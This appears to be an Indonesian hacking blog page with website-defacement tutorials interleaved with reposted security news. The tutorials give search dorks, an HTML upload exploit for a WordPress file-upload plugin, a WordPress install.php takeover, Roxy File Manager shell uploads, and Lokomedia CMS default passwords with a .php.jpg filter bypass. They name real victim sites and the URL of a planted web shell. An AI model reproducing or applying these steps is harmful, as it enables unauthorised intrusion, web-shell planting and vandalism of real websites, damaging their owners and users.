Deface dengan teknik Wordpress Plugins Jquery Html5 File Upload

=================================================================================

Wordpress Plugins Jquery Html5 File Upload Vulerability Arbitrary File Upload by Me
Author : AnoaGhost ‪#‎Intelsect‬
Dork : inurl:/wp-content/plugins/jquery-html5-file-upload/

=================================================================================
Poc:
http://students4students.us/wp-admin/admin-ajax.php…
Exploit
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By Mr.DreamX196</font><br>
<form method="POST" action="http://students4students.us/wp-admin/admin-ajax.php…"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
You can See Your File in There
smile emotikon
smile emotikon
Look My File
http://students4students.us/…/…//files//guest//dream.png
‪

Greet'Z : My Country Indonesian & My Friends

Temukan Celah Keamanan Pada Aplikasi Mobile Banking, Hacker Ini Bisa Curi Uang Hingga 340 Triliun

Sekarang dalam bertransaksi uang bisa dilakukan secara mobile berkat adanya aplikasi mobile banking yang disediakan oleh pihak bank. Apalagi bagi Anda yang sibuk hingga tidak sempat untuk mampir ke mesin ATM untuk mengirimkan uang kepada kerabat atau saudara, pasti lebih memilih menggunakan aplikasi mobile banking untuk melakukan transaksi. Namun tahukah Anda ternyata tidak selamanya aplikasi mobile banking selalu aman bagi para nasabah?

Seperti yang dilansir dari The Hacker News, Rabu (25/5/2016), dikatakan bahwa baru-baru ini salah satu hacker alias peretas asal India berhasil menemukan celah keamanan pada sebuah aplikasi mobile banking. Adalah Sathya Prakash yang mana adalah seorang white hacker atau bisa disebut sebagai pakar keamanan, yang menemukan celah pada salah satu bank di India yang masih dirahasiakan namanya.

Dikatakan bahwa Prakash bisa saja mengambil uang dari bank tersebut hingga 25 miliar USD atau jika dikonversikan sekitar 340 triliun Rupiah. Namun karena dirinya adalah white hacker, Prakash lebih memilih untuk melaporkan hal ini kepada pihak bank atas masalah ini, agar segera diperbaiki. Beruntung pihak bank menanggapi pesan dari Prakash dan tidak lama celah tersebut sudah ditambal.

Prakash menemukan celah pada aplikasi mobile banking tersebut sekitar akhir tahun 2015 lalu, dimana saat dia hendak mencoba salah satu aplikasi mobile banking pada perangkat iOS miliknya. Saat dicoba, dirinya melakukan debug untuk melihat cara kerja aplikasi tersebut, dan saat itu juga dia menemukan celah bahwa aplikasi tersebut memiliki kelemahan atau kekurangan pada Certificate Pinning.

Certificate Pinning ini merupakan mekanisme enkripsi suatu data di internet, untuk menghindari serangan-serangan para peretas. Namun karena lemahnya mekanisme tersebut, bisa saja terjadi serangan man-in-the-middle, yang mana memungkinkan peretas untuk melakukan downgrade pada jaringan SSL pada aplikasi mobile banking tersebut.

Tidak hanya itu saja, Prakash mengatakan juga bahwa aplikasi ini memiliki login session yang tidak aman. Sehingga memungkinkan para peretas untuk melakukan beberapa hal yang sangat berbahaya, tanpa harus mengetahui kata sandi dari pemilik rekening. Mulai dari melihat saldo nasabah tersebut, menambahkan penerima baru, serta melakukan transaksi ilegal lainnya.

Para Kandidat Capres AS Menjadi Mangsa Bagi Mata-mata Peretas Asing

Pemerintah Amerika Serikat melalui badan intelijennya mengungkap adanya hacker yang kini tengah berupaya untuk menggali informasi terkait latar belakang dan agenda para bakal calon presiden AS dengan cara menggunakan teknologi. 

Para peretas diduga bekerja untuk sejumlah pemerintah negara lain. Menyikapi hal tersebut, para pejabat pemerintahan AS bersikeras untuk meningkatkan kerjasama dengan pihak penyelenggara kampanye untuk setiap kandidat agar kecemasan di tengah pemilu ini dapat teratasi dengan baik.

Trauma Masa Lalu “Kami telah menemukan beberapa indikasi kuat terkait adanya upaya untuk meretas informasi para kandidat dengan menggunakan kekuatan digital,” Kata James Clapper, Kepala Badan Intelijen Nasional AS di Washington, mengutip The Guardian, Kamis (19/5/2016).

Ia menjelaskan bahwa kini FBI bersama dengan Department of Homeland Security tengah mengedukasi para penyelenggara kampanye cara untuk memastikan bahwa para kandidat tidak menjadi korban cyber-security dan untuk pencegahan di kemudian hari. 

Penjelasan tersebut kemudian diklarifikasi oleh Brian P. Hale, Kepala Divisi Hubungan Masyarakat untuk Badan Intelijen Nasional AS.

“Kami menyadari bahwa sejumlah pihak yang bersangkutan dalam keberlangsungan pemilu AS seperti tim kampanye, organisasi tertentu dan beberapa individu telah menjadi sasaran empuk bagi orang-orang tertentu yang termotivasi oleh beragam macam alasan,” jelasnya.

Ia lalu menyatakan bahwa pihaknya telah memberikan wewenang kepada FBI untuk menangani isu ini.

Kecemasan tersebut memuncak tidak lama setelah Badan Intelijen AS merilis sebuah dokumen pada awal bulan Mei ini yang menyatakan bahwa siklus pemilu tahun 2008 lalu telah dilacak oleh pihak intelijen asing. 

“Delapan tahun yang lalu pihak intelijen asing bertemu dengan pihak penyelenggara kampanye termasuk staf, memanipulasi mereka untuk mendapatkan informasi terkait kebijakan para kandidat, menggunakan teknologi untuk meretas sejumlah data yang dinyatakan sensitif dan pura-pura berpartisipasi dalam kegiatan di level manajemen untuk mempengaruhi perancangan kebijakan sesuai dengan kemauan mereka,” demikian pernyataan dalam dokumen tersebut, seperti dimuat oleh English News.

Walaupun kecemasan tersebut cenderung dipicu oleh trauma akan keberhasilan para peretas di pemilu sebelumnya, Jonathan Lampe dari InfoSec Institute, sebuah perusahaan untuk keamanan informasi sensitif merasa kemungkinannya justru jauh lebih besar untuk para kandidat bakal calon presiden AS di pemilu kali ini.

“Keamanan digital atau teknologi tidak pasti karena sistemnya belum diperbaiki secara maksimal,” ungkapnya. 

Terlebih, keberadaan kelompok peretas aktivis di dunia maya yang dewasa ini dikenal sebagai ‘Anonymous’, beserta aksinya untuk mengancam kandidat dari partai Republik, Donald Trump memperkuat dugaan adanya upaya peretas asing yang ingin mengulik informasi setiap petarung di pemilu AS kali ini.

Sumber : Liputan6.com

Deface dengan wp-install

Kali ini Saya akan mempostingkan bagaimana cara hack website yang menggunakan Wordpress dengan teknik WP-INSTALL

Pergi kesini dulu..

Kalo uda selesai, dah ketikkan diform pencarian /wp-admin/install.php bisa ditambahin Country:ID (Indonesia) / MY (Malaysia) / yang lain

 Pilih HTTP/1.0 302 Found, ya pasti uda tau lah knapa harus yg HTTP/1.0 302 Found.,.,kenapa bukan yg HTTP/1.0 302 Moved Temporarily

Karena kan kalau Found berarti Ditemukan, nah udah itu aja penjelasannya intinya pilih yg Found ,

Next, Isi Form nya,meliputi :

Site Title

Username

Password

seperti gambar dibawah :

TARAA.... FINISHH!  Mulai deh ganti tagline/title nya biar KE INDEX GOOGLE 

============================================================================

CATATAN :

KALO MUNCUL GINIAN , NIH , , (CEK GAMBAR DIBAWAH)

BERARTI NDAK BISA , LANJUT CARI LAGI AJA COZ UDA DI INSTALL SAMA SI EMPU NYA/KALAH CEPET MA ORANGG YANG LAGI BACA NIH TUTZ 

Source : IntelSect

Situs Sekolah Tinggi Intelijen Negara Berhasil Diretas Hacker

STIN adalah sebuah singkatan dari Sekolah Tinggi Intelijen Negara.

Namun, Sebagai website yang seharusnya memiliki kehandalan dalam security, malah berhasil diretas oleh hacker indonesia, kali ini tim Indonesian Intelegent Security yang unjuk gigi,
Memang jika melihat kilas kebelakang, tim ini sangat hebat, dari mulai hebat mengembangkan exploit exploit, mampu melakukan penetration pada security website, dll..

Kini, belum ada konfirmasi dari STIN terkait peretasan websitenya ini.

http://www.stin.ac.id

http://www.zone-h.org/mirror/id/25994868

Semoga dengan berita ini, menjadi sebuah tamparan bagi semua webmaster di Indonesia, saatnya untuk meningkatkan security websitenya masing masing.

Sekian..
Terimakasih

Deface dengan Roxy File Manager

Teknik yang satu ini adalah suatu teknik men-Deface dengan memanfaatkan filemager yang terdapat di dalam website dan nama filemangernya itu sendiri bernama Plugins Roxy File Manager.
Bahan-bahan :
- Dork : inurl:"Plugins/FileMan/" ( Use Your Brain ). :V
- Shell ( Download disini ).
- CSRF (Sama seperti CSRF jQuery)

Pertama tama yang harus anda lakukan adalah memasukan dork ke google atau search engine lain untuk mendapatkan target.
Setelah anda mendapatkan target, silahkan anda buka path fileman/php/upload.php --> http://target.com/fileman/php/upload.php Jika blank berati itu bisa mengupload file, nah untuk mengupload file di butuhkan CSRF ( bisa anda klik di atas )
Type file yang bisa di upload berupa .html .txt atau .php jika tidak bisa coba anda bypass shell dengan rename menjadi .php2, .php.jpg atau lainya.

Semisal anda berhasil mengupload file, maka anda masuk ke public_html kemudian anda cari file /index.php atau index.html, delete file tersebut dan ganti dengan script deface anda..

Live Target :

http://www.raceworld-karting.co.uk/fileman/index.html

Gimana mudah bukan ? selamat mencoba :)

Content Creator : Arief Dot ID

Tutorial Deface dengan Lokomedia

Assalamualaikum ^_^

Kali ini Saya mau Nge-Bahas Tutorial Deface Lokomedia ^_^
Nah Simak baik2 yah kakak ~

Ada Macam Bug di CMS Lokomedia ini :D

1. Default User and Password ~

- User  : Password -

admin : admin
wiro : sableng
wiros : sabdi
joko : sembung
sinto : gendeng

2. Upload Shell Langsung Tanpa Harus Login Admin ^_^

Ingad /adminweb/ nya bisa diganti Yah Sesuai path Admin Loginnya :v /

Exploit :

-  adminweb/content.php?module=download 
-  adminweb/content.php?module=banner
-  adminweb/content.php?module=berita


Nah Langsung Saja Kita bahas Cara2 nya >_< :D /
Disini Saya  Memakai Teknik Yang pertama Yaitu dengan Bug Default User and Password :D /

Oke Langsung Saja Kita Cari Targetnya dulu :v /

Dork nya ini : module=download intext:"cileungsi"

Dork Bisa Di Kembangin yah Kalo Mau Berhasil & Dapet Banyak Target Pastinya wkwk :v /

Nah gw Udah Dapet Target nih http://cyberandry.com/ Sebagai Kelinci Percobaan wkwk :v /

Sekarang coba buka Letak Login Adminnya ^_^
Biasa nya lokomedia :

/adminweb , /admin , /administrator

Kalau ga Ketemu ya bisa Pakai Admin Login Snanner kak :D /

Nah gw Udah Ketemu nih Admin Loginnya http://cyberandry.com/adminweb/ :D /

Coba Kamu Login Dengan Default User and Password Tadi Yang Saya Kasih Diatas :D 

 

Nah saya Berhasil Masuk wkwk :v

 

Nah Yang jadi Pertanyaan Gimana Cara Upload Shellnya ? :o

wkwk Tenang Vroh Ga Usah Panik kakak :v :v /

Cari Aja Fitur Yang Ada Uploader nya :D 

Nah Kalau Saya masang Shell nya Lewat Pasang Banner :D 

Klik " Banner "  - Terus  Klik " Tambah Banner " :D

Nah diKarenakan ga bisa Upload File Ber-Ekstensikan .php Terpaksa kita pakaiLive Http Headers Deh wkwkw Atau Tamper Data :v /

Kalau Belom Punya bisa di download Disini - > ( Live Http Headers ) atau Disini ( Temper Data ) :))

Kalau Saya Memakai Live Http Headers :D /

Nah Langsung aja ~ Rename Shell Kalian Jadi Formatnya gini shellkamu.php.jpg:D  

Lalu Klik " Tambah Banner " ~  

Isi Data2 nya Ngasal aja Kak wkwk :v 

  

Lalu Klik Simpan ~ Nah Lalu Segera Kalian Buka Fitur Live Http Headers tadi :)

Klik Tools - Lalu Klik " Live HTTP Headers " ~

 

Kalo Sudah Lalu Kita Rename shell nya :D jadi enzy-leovarisa.php.jpg Jadi enzy-leovarisa.php :D

Caranya Kita Cari File Yang Kalian Upload Tadi ~ Lihat Gambar Diatas :D 

Lalu Klik Replay :D

 

Kalo Sudah & Sukses ~ Klik Edit Pada Banner Yang Kalian Sudah Upload :D

Nanti Ada Gambar ( Kaya Foto Pecah2/ Rusak wkwk ) ~ Terus Kalian Klik Kanan di Gambar itu ~ Terus Klik " View Image " :D

  

Atau Bisa Juga Tinggal Kalian Panggil Shell Kalian :D

Caranya Kaya gini www.site.com/foto_banner/namashell.php

Shell Saya Nih http://www.cyberandry.com/foto_banner/enzy-leovarisa.php wkwk :D

  

Wkwkwk Muncul Deh Shell Kesayangan Papah >_<

Oke Sekian Dulu Ya Turial Ngawur Dari Ane ><

Semoga Bermamfaat Bagi Kalian Semua ^_^

Content Creator : Arief Dot ID